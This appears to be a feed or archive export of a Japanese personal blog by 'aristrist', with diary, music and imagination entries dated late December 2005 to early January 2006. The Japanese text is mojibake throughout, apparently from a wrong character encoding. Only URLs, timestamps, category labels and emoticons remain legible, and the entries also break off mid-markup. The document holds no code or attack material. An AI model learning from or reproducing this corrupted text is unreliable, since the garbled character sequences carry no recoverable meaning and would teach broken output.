    -₪ף¡ֱ¡¡₪₪₪₪ּ¾ֱ°₪ְw

    - -

    ¥®¥¿¡¼ִ´ְ°ֲט°לֳ³¬½×־»
    -₪ְ₪ף₪ְ₪ף°¦ֳו₪¬ֽ¯₪₪₪ֶ₪­₪₪·₪¿
    -₪₪ְ₪₪ְ¸¹¹ג²¼₪²₪¿₪₪₪ַ₪¹
    -₪ֶ₪«²¼₪²₪₪­₪ד¥¦¥₪¯ֳֶ₪±₪₪ֶ₪ף(¡­¡¦¦״¡¦)

    - -

    ¢£ ֽב¾ל₪ֻ₪ֶ
    -ָ±₪עְצ₪¦²¶₪־₪¦₪·₪ם₪ֳַֻ₪¿₪ֱ₪¬־©₪ֱֳֿ
    -¡״ֳז³״ְ¸₪₪¿₪₪₪ה₪¡(¾׀)
    -¡״₪½₪ל₪ֳֿ»₪¹₪®₪כ₪ה₪ם¡(¾׀)

    - -

    ָ±₪־ּ׃₪־ֳֿ₪·₪ֽ (¡­¡¦¦״¡¦)₪₪ֳ

    - -

    ¢¨ ¡״ֳ־₪י₪ּ₪₪ָֻ¯ַה₪µ₪ל₪ֶ₪¿ֲט»ֽ½½´¬¡(´ע)
    -

    - -
    ]]> -Diary -aristrist -2006-01-02T19:27:50+09:00 - - -[¶א²ל¿·ַ¯] -http://aristrist.s57.xrea.com/mt/archives/000934.html - ֻֽ₪־ָא½ק₪־¸‎₪ֿ¡״₪₪₪ֳ₪ֱ₪ד₪ה₪ְ¡₪ָ₪₪₪¦₪³₪ָ₪ֻ₪₪ֳ₪ֶ₪×₪ך₪₪¹ ₪×₪«₪²₪ַ₪₪ְ¡״¥₪₪ֳ₪¿¡₪³₪ָ₪¬₪¢₪ך₪₪»₪ף₪³₪ף₪׀₪ף₪ֻֿ¿₪ַ₪¹ ¿·ַ¯°לָ¯ּ₪«₪י¥¨¥ם¥ֽ¥¿₪ַ»ֶֿ°₪ַ₪¹₪¢₪±₪₪·₪¿₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹ ₪₪₪ה¡¼₪½₪ל₪ֻ₪·₪ֶ₪ג·ֲָ׃·ׂ₪¬₪י₪₪«₪ֳ₪¿₪ן¡¼ au₪ָ₪«docomo₪־ֽ§¿ֽ₪«₪י₪ֳֿו¿®₪¹₪כ₪־₪ֻ ¥³¥ֱ¥י₪«₪י₪ֿ°ל¸‏₪ֱֻק₪ל₪₪«₪ֳ₪¿₪ה(¡­¡¦¦״¡¦) ¥¿¥₪¥¥ף¥°°­₪₪₪ְ₪±₪« ₪₪ְ₪₪ף₪¬¼ו₪₪₪־₪« ₪א¡ֱ₪ף(-₪״-) ₪₪ף₪«₪ג₪¦ַ¯ֻצ₪¢₪ל₪ְ₪±µ₪₪¼₪ן₪·₪¯ֶ¯₪₪₪ֶ₪¿₪־₪ֻ ֶףֶ₪גµ₪א₪ָ₪ג₪¦¥¹¥ֳ¥«¥ך₪°¡¼₪¿₪יֳֻ₪ַ₪¹ ¿©₪₪ֶTV´ׁ₪ֶ¿²₪ֶ¿©₪₪ֶTV´ׁ₪ֶ¿²₪ֶ ₪³₪ף₪₪ף₪ַ÷£ַ¯₪־ַ¯ֻצ₪₪ַ₪ְֻ₪³¦ְ¬ֹ‏₪¹₪כ₪ָ₪₪₪¦ּמֻ¾₪ֿ₪«₪₪¦₪ף₪ַ₪·₪ח₪¦₪«(-₪״-) ₪₪ף₪«₪ֱ₪ד₪ף₪ֱ₪ד₪ף₪³ֳו₪ֳֵֶ¾ו₪ַ±יְג₪ָ₪«₪·₪ֶ₪½₪¦₪³¨₪¬ֹג₪«₪ף₪ַ₪­₪ֱ₪₪₪₪₪·₪¿₪₪ף₪ָ₪₪¯(¡°¦״¡°¡¡) ₪½₪ף₪₪ן₪±₪ַ ֱבֲ®¿·ַ¯²ס¹װ₪ֳ₪ֶ₪­₪₪¹(¡¬¢ֿ¡¬)... - - -

    ֻֽ₪־ָא½ק₪־¸‎₪ֿ¡״₪₪₪ֳ₪ֱ₪ד₪ה₪ְ¡₪ָ₪₪₪¦₪³₪ָ₪ֻ₪₪ֳ₪ֶ₪×₪ך₪₪¹
    -₪×₪«₪²₪ַ₪₪ְ¡״¥₪₪ֳ₪¿¡₪³₪ָ₪¬₪¢₪ך₪₪»₪ף₪³₪ף₪׀₪ף₪ֻֿ¿₪ַ₪¹

    - -

    ¿·ַ¯°לָ¯ּ₪«₪י¥¨¥ם¥ֽ¥¿₪ַ»ֶֿ°₪ַ₪¹₪¢₪±₪₪·₪¿₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹

    - -

    ₪₪₪ה¡¼₪½₪ל₪ֻ₪·₪ֶ₪ג·ֲָ׃·ׂ₪¬₪י₪₪«₪ֳ₪¿₪ן¡¼
    -au₪ָ₪«docomo₪־ֽ§¿ֽ₪«₪י₪ֳֿו¿®₪¹₪כ₪־₪ֻ
    -¥³¥ֱ¥י₪«₪י₪ֿ°ל¸‏₪ֱֻק₪ל₪₪«₪ֳ₪¿₪ה(¡­¡¦¦״¡¦)

    - -

    ¥¿¥₪¥¥ף¥°°­₪₪₪ְ₪±₪«
    -₪₪ְ₪₪ף₪¬¼ו₪₪₪־₪«
    -₪א¡ֱ₪ף(-₪״-)

    - -

    ₪₪ף₪«₪ג₪¦ַ¯ֻצ₪¢₪ל₪ְ₪±µ₪₪¼₪ן₪·₪¯ֶ¯₪₪₪ֶ₪¿₪־₪ֻ
    -ֶףֶ₪גµ₪א₪ָ₪ג₪¦¥¹¥ֳ¥«¥ך₪°¡¼₪¿₪יֳֻ₪ַ₪¹
    -¿©₪₪ֶTV´ׁ₪ֶ¿²₪ֶ¿©₪₪ֶTV´ׁ₪ֶ¿²₪ֶ

    - -

    ₪³₪ף₪₪ף₪ַ÷£ַ¯₪־ַ¯ֻצ₪₪ַ₪ְֻ₪³¦ְ¬ֹ‏₪¹₪כ₪ָ₪₪₪¦ּמֻ¾₪ֿ₪«₪₪¦₪ף₪ַ₪·₪ח₪¦₪«(-₪״-)
    -₪₪ף₪«₪ֱ₪ד₪ף₪ֱ₪ד₪ף₪³ֳו₪ֳֵֶ¾ו₪ַ±יְג₪ָ₪«₪·₪ֶ₪½₪¦₪³¨₪¬ֹג₪«₪ף₪ַ₪­₪ֱ₪₪₪₪₪·₪¿₪₪ף₪ָ₪₪¯(¡°¦״¡°¡¡)

    - -

    ₪½₪ף₪₪ן₪±₪ַ
    -ֱבֲ®¿·ַ¯²ס¹װ₪ֳ₪ֶ₪­₪₪¹(¡¬¢ֿ¡¬)
    -
    -

    ]]>
    -Diary -aristrist -2006-01-01T18:14:51+09:00 -
    - -[²»¸ִ»ל¿ִ] -http://aristrist.s57.xrea.com/mt/archives/000896.html -₪·»ב₪ֻ₪₪י₪ֳ₪ֶ¥ן¥¿¥¯¥·₪ג₪³₪³₪ֻ¥י¥₪¥פ¥¹¥±¥¸¥ו¡¼¥כ₪ע₪¢₪²₪ָ₪¯₪³₪ָ₪ֻ₪·₪₪¹¡£ ֶ¡¹₪־ֶµ­₪ֿ₪³₪־²¼₪ֻ₪₪ך₪₪¹¡£ ₪µ₪¡₪ֶ¼¡²ף₪־¥י¥₪¥פֽ½ִך₪ֿ¡© £²·מ£´ֶ¡ֵ¡ֻ¡¡¥ױ¥©¡¼¥¯¥׃¥ל¥ֳ¥¸¡¾®ֱׂ¡ֻ ¡״¥ױ¥©¡¼¡¦¥ױ¥©¡¼¥¹¥ב¥ף¡¦¥י¥₪¥פ¡ ¡¡20¡§00 ³«±י¡¡¥ֱ¥ד¡¼¥¸¡§1,000± ½׀±י¡§ֳ׃ִֵ ֽ־²נ¡¢ֻ¿ ֹקֽטָר¡¢₪«₪ן₪ֵ¡¢₪·₪־₪₪ה₪₪₪ײ ¢¨ ֽטַ¯£²·מ₪־ ₪·₪־₪₪ה₪₪₪ײ ¥½¥ם¡ץ´כ²ט¥י¥₪¥ײ¥ִ¥¢¡¼ ¡״¥ֿ¥ל¥¿¥ׂ¥ֿ¥ױ¥¿¥ך¥ֶ¥ע¥ִ¥¥₪¥ַ£²¡ ₪־°ל´ִ¥י¥₪¥פ₪ָ₪₪ך₪₪¹¡£ ¾ל½ך₪ֿ¾®ֱֻּׂ‎₪ֻ₪¢₪כֿ·₪־¥י¥₪¥פ¥ֿ¥¦¥¹ ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡µ₪₪ֻ₪₪כ¥י¥₪¥פ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ ¢£ ֳ׃ִֵ ֽ־²נ¡¡¥½¥ם¥י¥₪¥פ 2006ַ¯ °ל·מ¼·ֶ(ֵ)¡¡²ס¾ל¡§¸ָֽ×»װּ±²ס´ ֳז¥¡¼¥כ(¥¦¥§¥כ¸ָֽ×)¡¡¥ֱ¥±¥ֳ¥ָ¡§¡ן£µ£°£° (300ֻח¸ֲִך) ¥×¡¼¥׳¥ֻ¥ף¥°¥¢¥¯¥ָ₪ֻ ְמִֵ ־µֹ§... -₪·»ב₪ֻ₪₪י₪ֳ₪ֶ¥ן¥¿¥¯¥·₪ג₪³₪³₪ֻ¥י¥₪¥פ¥¹¥±¥¸¥ו¡¼¥כ₪ע₪¢₪²₪ָ₪¯₪³₪ָ₪ֻ₪·₪₪¹¡£
    -ֶ¡¹₪־ֶµ­₪ֿ₪³₪־²¼₪ֻ₪₪ך₪₪¹¡£

    - -

    ₪µ₪¡₪ֶ¼¡²ף₪־¥י¥₪¥פֽ½ִך₪ֿ¡©

    - -

    £²·מ£´ֶ¡ֵ¡ֻ¡¡¥ױ¥©¡¼¥¯¥׃¥ל¥ֳ¥¸¡¾®ֱׂ¡ֻ
    -¡״¥ױ¥©¡¼¡¦¥ױ¥©¡¼¥¹¥ב¥ף¡¦¥י¥₪¥פ¡ ¡¡20¡§00 ³«±י¡¡¥ֱ¥ד¡¼¥¸¡§1,000±

    - -

    ½׀±י¡§ֳ׃ִֵ ֽ־²נ¡¢ֻ¿ ֹקֽטָר¡¢₪«₪ן₪ֵ¡¢₪·₪־₪₪ה₪₪₪ײ
    -¢¨ ֽטַ¯£²·מ₪־ ₪·₪־₪₪ה₪₪₪ײ ¥½¥ם¡ץ´כ²ט¥י¥₪¥ײ¥ִ¥¢¡¼
    - ¡״¥ֿ¥ל¥¿¥ׂ¥ֿ¥ױ¥¿¥ך¥ֶ¥ע¥ִ¥¥₪¥ַ£²¡ ₪־°ל´ִ¥י¥₪¥פ₪ָ₪₪ך₪₪¹¡£
    -¾ל½ך₪ֿ¾®ֱֻּׂ‎₪ֻ₪¢₪כֿ·₪־¥י¥₪¥פ¥ֿ¥¦¥¹

    - -

    ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡µ₪₪ֻ₪₪כ¥י¥₪¥פ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡

    - -

    ¢£ ֳ׃ִֵ ֽ־²נ¡¡¥½¥ם¥י¥₪¥פ
    -2006ַ¯ °ל·מ¼·ֶ(ֵ)¡¡²ס¾ל¡§¸ָֽ×»װּ±²ס´ ֳז¥¡¼¥כ(¥¦¥§¥כ¸ָֽ×)¡¡¥ֱ¥±¥ֳ¥ָ¡§¡ן£µ£°£° (300ֻח¸ֲִך)
    -¥×¡¼¥׳¥ֻ¥ף¥°¥¢¥¯¥ָ₪ֻ ְמִֵ ־µֹ§
    -

    ]]>
    -Music -aristrist -2005-12-31T23:59:59+09:00 -
    - -[ֶף־ם¡¹¸] -http://aristrist.s57.xrea.com/mt/archives/000932.html -־דַ¯²ז¼ׂ₪ֿ12·מ₪ֻ¸ֲ₪ך»ֵ»צ₪־÷ַ½×ֶ₪ֻµכ־ֱ₪¬ּד₪¨₪כ₪³₪ָ₪ֻ₪₪ֳ₪ֶ₪כ₪־₪ַ₪¢₪כ₪¬ ÷£ַ¯₪ֿ¼ך°ד₪₪₪ַ₪₪ְּד₪¨₪ֶ₪₪₪₪¾(¡­¡¦¦״¡¦) ₪¦₪ֳ₪­¡¼¡פ ¡״₪³₪ף₪²ס¼ׂ₪ה₪ב₪ֶ₪ה₪כ!¡(by ֶ£ֳַָ₪¼₪) ₪½₪ף₪₪ן₪±₪ַ÷£ּכ₪ֽֿ§¿ֽS»בֲנ₪ַ¡״¥ױ¥©¡¼¥ױ¥©¡¼¥¹¥ב¥ף¡(ֽ׳₪¹₪כ₪ֻּמֿ÷₪׀₪ֳ₪«4¿ֽw)₪ַ₪³₪¸₪ף₪₪ך₪ָֻ÷ַ¯²ס₪¸₪₪¿₪³₪ָ₪ע₪·₪¿₪־₪ַ₪¢₪כ₪¬ ּµ°ל¸¥ױ¥¥¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬!! (₪©₪£ ±¿₪ט₪¯ֽ§¿ֽO»ב₪¬ַ¯ֻצ₪₪־₪ֻ¡¥ֱ¥ף¥³₪ֲַח¾¡₪ֱ₪·₪¿₪־₪ַ ֱ´³₪×₪´₪ך₪ַ₪·₪¿(¡°¦״¡°¡¡) ₪¢₪י₪¬₪¿₪·₪¢₪ך₪¬₪¿₪·(^¿ֽ^) ־דַ¯₪ֿ ₪ָ₪¢₪כ¥³¥ֶ¡¼¥¸₪ֲַחְ׸ֶ₪ף₪ַ¥ן¥₪¥ן¥₪±י₪כ₪ף₪ַ₪¹₪¬ ÷£ַ¯₪ֿS,O,K»ב+²¶₪ַ₪·₪ֳ₪₪ךֲּ₪ך₪₪·₪¿ ֶגֶֽ₪ֿ½×»ֿ¥¨¥ם¥ֽ¥¿ ₪ֱ₪₪₪ֻS»ב₪־ל₪גֶ±ְw ²ז₪¬ֽ§¿ֽ₪₪¬₪י¥¢¥₪׀₪ֳ₪«₪ַ₪¹₪¬ ׁ₪ַֻ¯¼ט₪י₪₪₪₪½₪־´¶³׀₪¬ֲח¹¥₪­₪ַ₪¹(¡¦¢ֿ¡¦)b »א₪ּ₪₪ַ¥¥±₪ָ¥ִ¥ֳ¥³¥₪ַ₪ט₪ם₪·₪ו₪¦₪×´ך₪₪₪·₪₪¹¡£... -־דַ¯²ז¼ׂ₪ֿ12·מ₪ֻ¸ֲ₪ך»ֵ»צ₪־÷ַ½×ֶ₪ֻµכ־ֱ₪¬ּד₪¨₪כ₪³₪ָ₪ֻ₪₪ֳ₪ֶ₪כ₪־₪ַ₪¢₪כ₪¬
    -÷£ַ¯₪ֿ¼ך°ד₪₪₪ַ₪₪ְּד₪¨₪ֶ₪₪₪₪¾(¡­¡¦¦״¡¦)

    - -

    ₪¦₪ֳ₪­¡¼¡פ
    -¡״₪³₪ף₪²ס¼ׂ₪ה₪ב₪ֶ₪ה₪כ!¡(by ֶ£ֳַָ₪¼₪)

    - -

    ₪½₪ף₪₪ן₪±₪ַ÷£ּכ₪ֽֿ§¿ֽS»בֲנ₪ַ¡״¥ױ¥©¡¼¥ױ¥©¡¼¥¹¥ב¥ף¡(ֽ׳₪¹₪כ₪ֻּמֿ÷₪׀₪ֳ₪«4¿ֽw)₪ַ₪³₪¸₪ף₪₪ך₪ָֻ÷ַ¯²ס₪¸₪₪¿₪³₪ָ₪ע₪·₪¿₪־₪ַ₪¢₪כ₪¬

    - -

    ּµ°ל¸¥ױ¥¥¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬¨¬!! (₪©₪£

    - -

    ±¿₪ט₪¯ֽ§¿ֽO»ב₪¬ַ¯ֻצ₪₪־₪ֻ¡¥ֱ¥ף¥³₪ֲַח¾¡₪ֱ₪·₪¿₪־₪ַ
    -ֱ´³₪×₪´₪ך₪ַ₪·₪¿(¡°¦״¡°¡¡)

    - -

    ₪¢₪י₪¬₪¿₪·₪¢₪ך₪¬₪¿₪·(^¿ֽ^)

    - -

    ־דַ¯₪ֿ ₪ָ₪¢₪כ¥³¥ֶ¡¼¥¸₪ֲַחְ׸ֶ₪ף₪ַ¥ן¥₪¥ן¥₪±י₪כ₪ף₪ַ₪¹₪¬
    -÷£ַ¯₪ֿS,O,K»ב+²¶₪ַ₪·₪ֳ₪₪ךֲּ₪ך₪₪·₪¿

    - -

    ֶגֶֽ₪ֿ½×»ֿ¥¨¥ם¥ֽ¥¿
    -₪ֱ₪₪₪ֻS»ב₪־ל₪גֶ±ְw
    -²ז₪¬ֽ§¿ֽ₪₪¬₪י¥¢¥₪׀₪ֳ₪«₪ַ₪¹₪¬
    -ׁ₪ַֻ¯¼ט₪י₪₪₪₪½₪־´¶³׀₪¬ֲח¹¥₪­₪ַ₪¹(¡¦¢ֿ¡¦)b

    - -

    »א₪ּ₪₪ַ¥¥±₪ָ¥ִ¥ֳ¥³¥₪ַ₪ט₪ם₪·₪ו₪¦₪×´ך₪₪₪·₪₪¹¡£

    ]]>
    -Diary -aristrist -2005-12-30T19:00:06+09:00 -
    - -[¸‎ְט»°ֵ׃] -http://aristrist.s57.xrea.com/mt/archives/000931.html - ₪₪ף₪ִ¡¼₪«¥¢¥ל₪ְ ¿ֽֽֽ(ְ₪´ײ°לָּ)₪¬µֶ₪ֶֻ‏₪ֳ₪ֶ₪₪₪כ₪־₪ֶֻ¯₪₪₪ֶ₪₪₪כ₪ָ₪₪₪¦»צ¼ֲ₪¬ָף¾ן₪ֻ¢־©₪¿₪·₪₪ ¼ֲ₪ֻ¢־©₪¿₪·₪₪ ₪ג₪¦₪ה₪ֳ₪ֶ₪י₪ף₪ֽ ֶ»ֿ©¶ץ₪₪₪ֶ₪כ₪· ₪ָ₪«»׳₪ֳ₪ֶ₪כֵ ₪¢₪כ°ױּ£¡¢ְµ²ע₪ַ₪¹ ₪×ֱ°₪¬₪ה₪ל¡× ֶֻ₪־ּ₪ֽט₪עׁ₪¨₪ם¡× ½©ֽױ¸¶₪«₪י¡ִ¡¡ֻ¨₪¨¡ֱ ₪³₪ף₪׀₪ף₪ןֻ¿ ֹקֽטָר₪ַ₪¹¡£ ₪ג₪¦₪ֽ 12·מ₪ָ₪«ֲח·ש₪₪ ֵ·¹ְֲֳִ¸ֶ₪ג¥­¥ך¥¹¥ְָ¸ֲֳ₪ג¥¡¼¥¥¹₪ג ₪₪ף₪ג₪«₪ף₪ג´״·¸₪ֽ¡¼₪¯₪µַמֲ¿ ֻ»₪·₪₪₪׀₪ֳ₪«₪ַ₪₪₪ה₪ף₪₪₪ה₪ף ₪ָ₪ף₪ַ₪ג₪₪₪°לֶ₪־½×₪ן₪ך₪ע²ב₪´₪·₪ֶ₪×₪ך₪₪¹₪ט₪ג₪¦ ₪ַ₪גֹבֳ¸ֶָֹ₪»ֵ»צ₪ג₪₪ף₪₪ַ¥ן¥₪¥ן¥₪₪ה₪ל₪׀ ₪½₪ל₪ג₪₪¿ּ₪·(¡¦¢ֿ¡¦)£ג... -

    - -

    ₪₪ף₪ִ¡¼₪«¥¢¥ל₪ְ
    -¿ֽֽֽ(ְ₪´ײ°לָּ)₪¬µֶ₪ֶֻ‏₪ֳ₪ֶ₪₪₪כ₪־₪ֶֻ¯₪₪₪ֶ₪₪₪כ₪ָ₪₪₪¦»צ¼ֲ₪¬ָף¾ן₪ֻ¢־©₪¿₪·₪₪
    -¼ֲ₪ֻ¢־©₪¿₪·₪₪
    -₪ג₪¦₪ה₪ֳ₪ֶ₪י₪ף₪ֽ
    -ֶ»ֿ©¶ץ₪₪₪ֶ₪כ₪·
    -₪ָ₪«»׳₪ֳ₪ֶ₪כֵ

    - -

    ₪¢₪כ°ױּ£¡¢ְµ²ע₪ַ₪¹

    - -

    ₪×ֱ°₪¬₪ה₪ל¡×
    -ֶֻ₪־ּ₪ֽט₪עׁ₪¨₪ם¡×

    - -

    ½©ֽױ¸¶₪«₪י¡ִ¡¡ֻ¨₪¨¡ֱ

    - -

    ₪³₪ף₪׀₪ף₪ןֻ¿ ֹקֽטָר₪ַ₪¹¡£

    - -

    ₪ג₪¦₪ֽ
    -12·מ₪ָ₪«ֲח·ש₪₪
    -ֵ·¹ְֲֳִ¸ֶ₪ג¥­¥ך¥¹¥ְָ¸ֲֳ₪ג¥¡¼¥¥¹₪ג
    -₪₪ף₪ג₪«₪ף₪ג´״·¸₪ֽ¡¼₪¯₪µַמֲ¿

    - -

    ֻ»₪·₪₪₪׀₪ֳ₪«₪ַ₪₪₪ה₪ף₪₪₪ה₪ף
    -₪ָ₪ף₪ַ₪ג₪₪₪°לֶ₪־½×₪ן₪ך₪ע²ב₪´₪·₪ֶ₪×₪ך₪₪¹₪ט₪ג₪¦

    - -

    ₪ַ₪גֹבֳ¸ֶָֹ₪»ֵ»צ₪ג₪₪ף₪₪ַ¥ן¥₪¥ן¥₪₪ה₪ל₪׀
    -₪½₪ל₪ג₪₪¿ּ₪·(¡¦¢ֿ¡¦)£ג

    ]]>
    -Imagine -aristrist -2005-12-29T23:59:42+09:00 -
    - -[¸זַֽׁ¼ּ] -http://aristrist.s57.xrea.com/mt/archives/000930.html - ₪ה₪ֳ₪ׁ²ז¡¹²»³₪ע±י₪כ¿ֽ´ײ₪ֳ₪ִ¡¼₪־₪ֿ ¼עֶ₪א»‏₪ג²»³±י₪ֳ₪¿₪ך´ׁ₪¿₪ך₪·₪₪¬₪י ֲ¾¿ֽ₪־²»³₪־₪³₪ָ₪ע¥¢¥ל₪ה¥³¥ל₪ה¸¶ח₪ָ₪«¾־»¿¸ְ₪₪₪¢₪₪₪₪¬₪י ¥×¥ֽ¡¼¥ֱ¥ד¥ף₪ֻ¥­¥ד₪ֳ¥­¥ד₪ֳ¸ְ₪ן₪ל₪₪¬₪י ₪½₪ף₪»‏´ײ₪¬±±ף₪ֲֻ³₪¯₪«₪־₪ט₪¦₪»ך¡₪־´×°ד₪₪₪ע·«₪ךײ₪·₪ִ₪ִ ³₪·₪₪¿₪₪₪ג₪ף₪ַ₪¹₪ ְ₪´ײ₪ֿ₪½₪ם₪½₪ם¸זַֽׁ¼₪ב₪ַ₪¹₪¬ ¥ן¥¿¥·₪ֿ₪₪ְ₪₪ְ₪×₪µ₪₪ך₪₪»₪ף(T_T) ¢¨ ¡״₪₪¾₪־ְ¸×¡ ₪ָ¥¥ף₪ַ½ס₪₪₪ֶ₪¢₪ך₪₪¹£ק(µ·ֶ¼¼₪ֻ₪ֶ)... - - -

    ₪ה₪ֳ₪ׁ²ז¡¹²»³₪ע±י₪כ¿ֽ´ײ₪ֳ₪ִ¡¼₪־₪ֿ
    -¼עֶ₪א»‏₪ג²»³±י₪ֳ₪¿₪ך´ׁ₪¿₪ך₪·₪₪¬₪י
    -ֲ¾¿ֽ₪־²»³₪־₪³₪ָ₪ע¥¢¥ל₪ה¥³¥ל₪ה¸¶ח₪ָ₪«¾־»¿¸ְ₪₪₪¢₪₪₪₪¬₪י
    -¥×¥ֽ¡¼¥ֱ¥ד¥ף₪ֻ¥­¥ד₪ֳ¥­¥ד₪ֳ¸ְ₪ן₪ל₪₪¬₪י
    -₪½₪ף₪»‏´ײ₪¬±±ף₪ֲֻ³₪¯₪«₪־₪ט₪¦₪»ך¡₪־´×°ד₪₪₪ע·«₪ךײ₪·₪ִ₪ִ
    -³₪·₪₪¿₪₪₪ג₪ף₪ַ₪¹₪

    - -

    ְ₪´ײ₪ֿ₪½₪ם₪½₪ם¸זַֽׁ¼₪ב₪ַ₪¹₪¬
    -¥ן¥¿¥·₪ֿ₪₪ְ₪₪ְ₪×₪µ₪₪ך₪₪»₪ף(T_T)

    - -

    ¢¨ ¡״₪₪¾₪־ְ¸×¡ ₪ָ¥¥ף₪ַ½ס₪₪₪ֶ₪¢₪ך₪₪¹£ק(µ·ֶ¼¼₪ֻ₪ֶ)
    -

    - -
    ]]>
    -Imagine -aristrist -2005-12-28T21:41:07+09:00 -
    - -[°®¸ֵֹנ»־] -http://aristrist.s57.xrea.com/mt/archives/000929.html - 30ֶ₪ֶֻג־״₪ַ₪·₪ֳ₪₪ך₪ָֻ÷ַ¯²ס₪₪¿₪₪₪₪ג₪־₪ע₪ה₪כֽ½ִך₪ַ₪¹₪¬ ₪ֹ₪ֳ₪«¥₪¥₪¥ָ¥³₪₪₪₪ַ₪¹₪«₪ֽ₪§(¡­¡¦¦״¡¦) ֻטַ¯₪ה₪ֳ₪ֶ₪כֻ÷ַ¯±י²ס₪ג₪ִ₪₪₪ֻ¥ן¥¿¥·₪־¥ֶ¥ף¥·¥ח¥ף¥ְ¥¦¥ף»‎₪ֱִ¾₪µ₪÷ ÷£ַ¯₪ֿ³«÷ֵ₪עֳַַ°₪·₪ֶ₪·₪₪₪₪₪·₪¿(¡­¡¦¦״¡¦) ₪₪¢¾¯₪·₪÷₪ִ₪ַ₪¹₪¬ֱ°¸‏₪­₪ֻ¥ֶ¥ף¥·¥ח¥ף¾ו₪²₪ֶ₪₪₪­₪¿₪₪₪ָ»׳₪₪₪₪¹¡£ ¢¨ ¡״¥₪¥°¥¢¥¼ע(¥¹¥װ¥ך¥ֳ¥ִ)¡(₪¿¡¼₪»ב÷¹₪·ֶ‏₪ל)¡¡¶¯־ץ¡ִ... - - -

    30ֶ₪ֶֻג־״₪ַ₪·₪ֳ₪₪ך₪ָֻ÷ַ¯²ס₪₪¿₪₪₪₪ג₪־₪ע₪ה₪כֽ½ִך₪ַ₪¹₪¬
    -₪ֹ₪ֳ₪«¥₪¥₪¥ָ¥³₪₪₪₪ַ₪¹₪«₪ֽ₪§(¡­¡¦¦״¡¦)

    - -

    ֻטַ¯₪ה₪ֳ₪ֶ₪כֻ÷ַ¯±י²ס₪ג₪ִ₪₪₪ֻ¥ן¥¿¥·₪־¥ֶ¥ף¥·¥ח¥ף¥ְ¥¦¥ף»‎₪ֱִ¾₪µ₪÷
    -÷£ַ¯₪ֿ³«÷ֵ₪עֳַַ°₪·₪ֶ₪·₪₪₪₪₪·₪¿(¡­¡¦¦״¡¦)

    - -

    ₪₪¢¾¯₪·₪÷₪ִ₪ַ₪¹₪¬ֱ°¸‏₪­₪ֻ¥ֶ¥ף¥·¥ח¥ף¾ו₪²₪ֶ₪₪₪­₪¿₪₪₪ָ»׳₪₪₪₪¹¡£

    - -

    - -

    ¢¨ ¡״¥₪¥°¥¢¥¼ע(¥¹¥װ¥ך¥ֳ¥ִ)¡(₪¿¡¼₪»ב÷¹₪·ֶ‏₪ל)¡¡¶¯־ץ¡ִ
    -

    - -
    ]]>
    -Diary -aristrist -2005-12-27T22:29:31+09:00 -
    - -[ג±¶ז³ֹפ] -http://aristrist.s57.xrea.com/mt/archives/000926.html - ֻטַ¯₪³₪־µ¨ְב₪ֻ₪₪כ₪ָ¥¢¥«¥®¥ל₪¬¹ף₪¯₪ֶ¥®¥¿¡¼₪־־‎½¬₪¬¿ֹ₪₪₪ֳ¥¹₪ֽ ·ֲָ׃₪־¿ֶ»״¥ב¡¼¥כֲַ₪ִ₪־₪גִֻ₪₪₪ֳ¥¹ ÷עֶ₪־¥«¥ף¥¿¡¼¥ל÷׳₪ֿ¥¥¹¥¿¡¼₪־¥®¥¿¡¼₪ע¼₪ך₪¿₪־₪ַ₪¹₪¬ ¥¡¼¥ֱ¥ף₪־¥®¥¿¡¼₪«₪ָ»׳₪ֳ₪ֶ₪₪₪¿₪י ¥¥¹¥¿¡¼¼«÷מ₪־¥®¥¿¡¼₪ַ₪·₪¿ ֹבֳ¡¢¸¹¹ג₪ע¶ֻ¸ֲ₪₪ַ₪×₪ָ₪·₪ֶ₪כ¥×¥י₪ֻ₪ֿ÷³₪«ֳֶ₪­₪ֻ₪¯₪«₪ֳ₪¿₪ַ₪¹₪¬ ₪₪«₪₪«־ֹ₪₪¥®¥¿¡¼₪ַ₪¹₪¿ ¥×¥י₪־¥®¥¿¡¼₪ֿ¸½÷¥ױ¥ל¥ֳ¥ָ₪־°לֹפ₪ֻ¶ֳֻ¼₪¥¯¥»₪¬ֹױ₪₪₪ֶ₪·₪₪ֳ₪ֶ ֳִֶך₪־¾ל½ך₪ע²¡₪µ₪¨₪כ₪ָ²»₪¬ִֿ₪ף₪¸₪ד₪ֳ₪ֶ₪כ₪ף₪ַ₪¹₪¬ ÷£ֵ¥¥¹¥¿¡¼₪ֻ₪ֱ₪ח₪₪₪ָ₪₪₪¸₪ֳ₪ֶ₪ג₪י₪×₪¦₪«₪ָ»׳₪ֳ₪ֶ₪×₪ך₪₪¹¡£ ¥®¥¿¡¼¥¥¹¥ָ₪ֻ₪·₪ָ₪«₪₪₪₪ָ ¼«¬₪ֻ₪ג₪×µׂ₪µ₪ף₪ֻ₪ג¥¹¥ָ¥ל¥¹₪ֻ₪₪כ₪·₪ֽ¡¡°¦״¡°¡¡¡ֻ ¢¨ ¡״²ר₪·₪₪ַ¯ֻצֲחֱ½¿ֽ₪ָ¥¥¹¥¿¡¼¡... - - -

    ֻטַ¯₪³₪־µ¨ְב₪ֻ₪₪כ₪ָ¥¢¥«¥®¥ל₪¬¹ף₪¯₪ֶ¥®¥¿¡¼₪־־‎½¬₪¬¿ֹ₪₪₪ֳ¥¹₪ֽ
    -·ֲָ׃₪־¿ֶ»״¥ב¡¼¥כֲַ₪ִ₪־₪גִֻ₪₪₪ֳ¥¹

    - -

    ÷עֶ₪־¥«¥ף¥¿¡¼¥ל÷׳₪ֿ¥¥¹¥¿¡¼₪־¥®¥¿¡¼₪ע¼₪ך₪¿₪־₪ַ₪¹₪¬
    -¥¡¼¥ֱ¥ף₪־¥®¥¿¡¼₪«₪ָ»׳₪ֳ₪ֶ₪₪₪¿₪י
    -¥¥¹¥¿¡¼¼«÷מ₪־¥®¥¿¡¼₪ַ₪·₪¿

    - -

